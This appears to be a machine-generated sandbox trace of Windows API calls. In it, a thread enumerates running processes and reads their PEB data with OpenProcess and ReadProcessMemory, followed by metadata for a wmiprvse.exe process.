[0414.798] _ui64tow (_Value=0xcb4, _Buffer="2736", _Radix=10) returned="3252"
[0414.832] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3252") returned 4
[0414.833] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.833] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.857] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb4) returned 0x0
[0414.857] CloseHandle (hObject=0x0) returned 0
[0414.858] _ui64tow (_Value=0xe78, _Buffer="3252", _Radix=10) returned="3704"
[0414.862] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3704") returned 4
[0414.870] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.870] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.895] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe78) returned 0x0
[0414.895] CloseHandle (hObject=0x0) returned 0
[0414.896] _ui64tow (_Value=0xf00, _Buffer="3704", _Radix=10) returned="3840"
[0414.901] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3840") returned 4
[0414.902] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.902] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf00) returned 0x0
[0414.927] CloseHandle (hObject=0x0) returned 0
[0414.928] _ui64tow (_Value=0xb60, _Buffer="3840", _Radix=10) returned="2912"
[0414.932] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2912") returned 4
[0414.934] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.934] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x0
[0414.955] CloseHandle (hObject=0x0) returned 0
[0414.957] _ui64tow (_Value=0x384, _Buffer="2912", _Radix=10) returned="900"
[0414.961] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="900") returned 3
[0414.962] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.990] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x384) returned 0x24c
[0414.990] GetLastError () returned 0x0
[0414.990] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c28b0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.991] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c2688, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.992] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.993] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.993] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.993] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.994] malloc (_Size=0x116) returned 0x2c3520
[0414.994] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c26c8, lpBuffer=0x2c3520, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0414.994] free (_Block=0x2c3520)
[0414.995] CloseHandle (hObject=0x24c) returned 1
[0414.996] _ui64tow (_Value=0x424, _Buffer="900", _Radix=10) returned="1060"
[0415.001] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1060") returned 4
[0415.002] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.002] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x24c
[0415.027] GetLastError () returned 0x0
[0415.027] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.027] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.027] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.028] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f2850, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.028] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f26c8, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.029] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.030] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.030] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.030] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.031] malloc (_Size=0x80) returned 0x2e3b00
[0415.031] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f270a, lpBuffer=0x2e3b00, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b00*, lpNumberOfBytesRead=0x0) returned 1
[0415.031] free (_Block=0x2e3b00)
[0415.032] CloseHandle (hObject=0x24c) returned 1
[0415.033] _ui64tow (_Value=0xd68, _Buffer="1060", _Radix=10) returned="3432"
[0415.038] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3432") returned 4
[0415.039] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.039] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd68) returned 0x0
[0415.062] CloseHandle (hObject=0x0) returned 0
[0415.063] _ui64tow (_Value=0x6a8, _Buffer="3432", _Radix=10) returned="1704"
[0415.070] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1704") returned 4
[0415.072] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.072] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.093] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0
[0415.093] CloseHandle (hObject=0x0) returned 0
[0415.094] _ui64tow (_Value=0x8d0, _Buffer="1704", _Radix=10) returned="2256"
[0415.099] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2256") returned 4
[0415.101] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.101] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x0
[0415.123] CloseHandle (hObject=0x0) returned 0
[0415.123] _ui64tow (_Value=0xdb8, _Buffer="2256", _Radix=10) returned="3512"
[0415.128] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3512") returned 4
[0415.129] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.129] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.151] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdb8) returned 0x24c
[0415.151] GetLastError () returned 0x0
[0415.151] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd9018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.152] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1126ca, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.153] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.154] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.154] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd9020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.154] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x111ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.155] malloc (_Size=0xc6) returned 0x2c3520
[0415.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x112702, lpBuffer=0x2c3520, nSize=0xc4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0415.155] free (_Block=0x2c3520)
[0415.156] CloseHandle (hObject=0x24c) returned 1
[0415.157] _ui64tow (_Value=0xc98, _Buffer="3512", _Radix=10) returned="3224"
[0415.162] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3224") returned 4
[0415.163] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.163] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc98) returned 0x24c
[0415.190] GetLastError () returned 0x0
[0415.191] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x222350, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x22215a, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.192] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.193] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x221990, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] malloc (_Size=0xf0) returned 0x2c3520
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x22219a, lpBuffer=0x2c3520, nSize=0xee, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] free (_Block=0x2c3520)
[0415.195] CloseHandle (hObject=0x24c) returned 1
[0415.196] _ui64tow (_Value=0xe68, _Buffer="3224", _Radix=10) returned="3688"
[0415.201] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3688") returned 4
[0415.202] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.202] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.225] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe68) returned 0x24c
[0415.225] GetLastError () returned 0x0
[0415.225] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.225] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.225] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526ca, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.227] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.228] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.229] malloc (_Size=0x28) returned 0x2bfe40
[0415.229] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25270c, lpBuffer=0x2bfe40, nSize=0x26, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bfe40*, lpNumberOfBytesRead=0x0) returned 1
[0415.229] free (_Block=0x2bfe40)
[0415.230] CloseHandle (hObject=0x24c) returned 1
[0415.230] free (_Block=0x2c9220)
[0415.230] malloc (_Size=0x48) returned 0x2bd400
[0415.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12dd918 | out: lpSystemTimeAsFileTime=0x12dd918*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.231] SetEvent (hEvent=0x1f8) returned 1
[0415.249] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x4) returned 0x15da90
[0415.249] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x15da90, pulNumLanguages=0x12de480 | out: pulNumLanguages=0x12de480) returned 1
[0415.249] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da90 | out: hHeap=0x120000) returned 1
Thread:
id = 125
os_tid = 0xcd4
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0x493d0, bAlertable=0) returned 0x0
[0410.821] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0x2720, bAlertable=0) returned 0x102
[0425.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x152895c0, dwHighDateTime=0x1dab599))
[0425.238] free (_Block=0x2bf020)
[0425.238] FreeLibrary (hLibModule=0x77880000) returned 1
[0425.240] free (_Block=0x2c3750)
[0425.241] free (_Block=0x2bd400)
[0425.241] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0xffffffff, bAlertable=0)
Thread:
id = 126
os_tid = 0xcd0
Thread:
id = 127
os_tid = 0xcc0
Thread:
id = 128
os_tid = 0xcbc
Thread:
id = 129
os_tid = 0xcb8
Thread:
id = 140
os_tid = 0xdac
Thread:
id = 141
os_tid = 0xda4
Process:
id = "22"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x65682000"
os_pid = "0x628"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e990"
monitor_reason = "rpc_server"
parent_id = "5"
os_parent_pid = "0x254"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
